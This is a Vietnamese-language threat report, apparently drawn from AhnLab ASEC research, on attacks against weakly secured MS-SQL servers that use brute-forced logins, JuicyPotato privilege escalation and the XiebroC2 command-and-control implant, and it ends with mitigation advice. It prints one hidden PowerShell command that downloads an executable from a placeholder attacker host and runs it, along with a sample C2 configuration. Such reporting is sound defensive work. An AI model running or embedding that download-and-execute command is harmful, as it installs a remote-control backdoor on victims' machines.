Gần đây, một làn sóng tấn công mạng nhắm vào các máy chủ MS-SQL được quản lý không đúng cách đã gia tăng đáng kể. Các cuộc tấn công này thường kết thúc bằng việc triển khai khung làm việc chỉ huy và kiểm soát (C2) mã nguồn mở XiebroC2.
Tổng Quan về Các Cuộc Tấn Công MS-SQL và Mối Đe Dọa Mạng từ XiebroC2
XiebroC2, tương tự như các công cụ hợp pháp như Cobalt Strike về mặt chức năng, cung cấp khả năng thu thập thông tin, điều khiển từ xa và né tránh phòng thủ. Điều này khiến nó trở thành một lựa chọn hấp dẫn cho các tác nhân đe dọa tìm kiếm một nền tảng xâm nhập hiệu quả về chi phí.
Phương Thức Khai Thác Ban Đầu
Trong một sự cố được xác nhận, các tác nhân tấn công đã lợi dụng thông tin xác thực máy chủ MS-SQL bị phơi bày công khai để có được quyền truy cập trái phép. Sau khi brute-force các mật khẩu yếu hoặc mặc định, những kẻ xâm nhập đã thực hiện một chuỗi triển khai payload phổ biến trong các vụ xâm nhập MS-SQL, với các công cụ khai thác tiền điện tử là phần mềm độc hại được lựa chọn chính.
Nâng Cao Đặc Quyền với JuicyPotato
Sau khi xác thực thành công, các tác nhân đe dọa đã thả JuicyPotato, một tiện ích nâng cao đặc quyền. Tiện ích này khai thác các đặc quyền Windows cụ thể trong các token của tiến trình MS-SQL đang chạy.
Mặc dù dịch vụ SQL Server tự chạy dưới tài khoản đặc quyền thấp theo mặc định, JuicyPotato đã cho phép kẻ tấn công leo thang lên đặc quyền SYSTEM. Thông tin chi tiết về cơ chế này được các nhà nghiên cứu của Trung tâm Tình báo Bảo mật AhnLab (ASEC) tiết lộ tại ASEC Report.
Bằng chứng về việc tải xuống và thực thi đã được ghi lại trong nhật ký máy chủ, cho thấy chức năng Invoke-WebRequest của PowerShell kéo payload XiebroC2 qua HTTP. Chuỗi này nhấn mạnh rủi ro nghiêm trọng do các máy chủ cơ sở dữ liệu công khai không có chính sách thông tin xác thực mạnh mẽ hoặc kiểm soát truy cập cấp độ mạng.
Triển Khai và Cơ Chế Hoạt Động của XiebroC2
Tải và Cài Đặt XiebroC2
Với đặc quyền SYSTEM được đảm bảo, kẻ tấn công đã thực thi lệnh PowerShell để truy xuất và cài đặt XiebroC2 trực tiếp từ kho lưu trữ GitHub của nó.
Đoạn mã PowerShell được sử dụng tương tự như sau:
powershell -nop -w hidden -c "Invoke-WebRequest -Uri hxxp://attacker.com/XiebroC2.exe -OutFile C:\Windows\Temp\XiebroC2.exe; Start-Process C:\Windows\Temp\XiebroC2.exe"Tính Năng của Implant XiebroC2
Thành phần implant của XiebroC2—chức năng backdoor cốt lõi—được viết bằng Go, cung cấp hỗ trợ đa nền tảng cho các hệ thống Windows, Linux và macOS. Sau khi được triển khai, implant sẽ khởi tạo kết nối đến máy chủ C2 của kẻ tấn công, xác thực bằng khóa AES được cấu hình sẵn và chờ lệnh.
Các tính năng phổ biến bao gồm:
- Thực thi lệnh từ xa.
- Quản lý tệp (tải lên/tải xuống).
- Thu thập thông tin hệ thống.
- Mở rộng quyền truy cập (Lateral Movement).
- Né tránh các giải pháp bảo mật.
Cấu Hình C2 trong Thực Tế
Khi thực thi, XiebroC2 thu thập các chi tiết môi trường như ID tiến trình (PID), ID phần cứng (HWID), tên máy tính và tên người dùng. Sau đó, nó kết nối minh bạch với máy chủ C2 để đăng ký máy chủ bị xâm phạm. Trong sự cố được ASEC giám sát, các thông số cấu hình như sau:
Connect_Type: WebSocket
Target_IP: 185.192.17.XXX
Target_Port: 8080
AES_KEY: <preconfigured_AES_key_hash>Các giá trị này cho phép implant thiết lập một phiên WebSocket được mã hóa liên tục qua TCP, cung cấp giao tiếp hai chiều linh hoạt ngay cả khi có sự gián đoạn mạng. Sau khi kết nối, kẻ tấn công có thể thực thi các lệnh tùy ý hoặc triển khai các payload bổ sung, củng cố chỗ đứng để di chuyển ngang hoặc đánh cắp dữ liệu.
Các Biện Pháp Phòng Ngừa và Giảm Thiểu
Thiết Lập Chính Sách Xác Thực Mạnh
Quản trị viên phải vô hiệu hóa thông tin xác thực yếu hoặc mặc định trên các máy chủ MS-SQL. Việc triển khai mật khẩu phức tạp, duy nhất và bật chính sách khóa tài khoản sẽ giảm đáng kể tỷ lệ thành công của các cuộc tấn công mạng brute-force và từ điển.
Hạn Chế Phơi Nhiễm Công Khai
Các phiên bản MS-SQL không nên được truy cập trực tiếp từ Internet. Sử dụng phân đoạn mạng và các quy tắc tường lửa để hạn chế quyền truy cập cơ sở dữ liệu chỉ cho các máy chủ ứng dụng được ủy quyền hoặc các điểm cuối VPN.
Thường Xuyên Cập Nhật và Vá Lỗi
Đảm bảo tất cả các điểm cuối chạy dịch vụ MS-SQL đều được vá đầy đủ và chạy các bản cập nhật bảo mật mới nhất. Các lỗ hổng CVE trong các tiến trình máy chủ dịch vụ có thể tạo điều kiện cho việc xâm nhập ban đầu và leo thang đặc quyền. Việc duy trì bảo mật thông tin hệ thống là tối quan trọng.
Giám Sát và Cảnh Báo
Triển khai các hệ thống phát hiện xâm nhập (IDS) có khả năng gắn cờ các nỗ lực đăng nhập bất thường, thực thi công cụ nâng cao đặc quyền không mong muốn (ví dụ: JuicyPotato) và các kết nối mạng đi bất thường—đặc biệt là đến các địa chỉ IP bên ngoài không xác định và các cổng không phổ biến.
Bảo Vệ Điểm Cuối
Sử dụng các giải pháp chống phần mềm độc hại cập nhật để phát hiện và cách ly các công cụ đã biết như JuicyPotato và các thành phần khung C2. Phân tích hành vi có thể cung cấp cảnh báo sớm về các hoạt động do thám hoặc di chuyển ngang.
ASEC tiếp tục theo dõi các mối đe dọa mạng mới nổi nhắm vào các máy chủ cơ sở dữ liệu và khuyến khích các tổ chức áp dụng phương pháp tiếp cận phòng thủ chuyên sâu. Việc không bảo vệ các cơ chế xác thực, không duy trì các bản vá lỗi cập nhật và không hạn chế quyền truy cập mạng có thể dẫn đến lây nhiễm lặp đi lặp lại và xâm phạm cơ sở hạ tầng quan trọng.
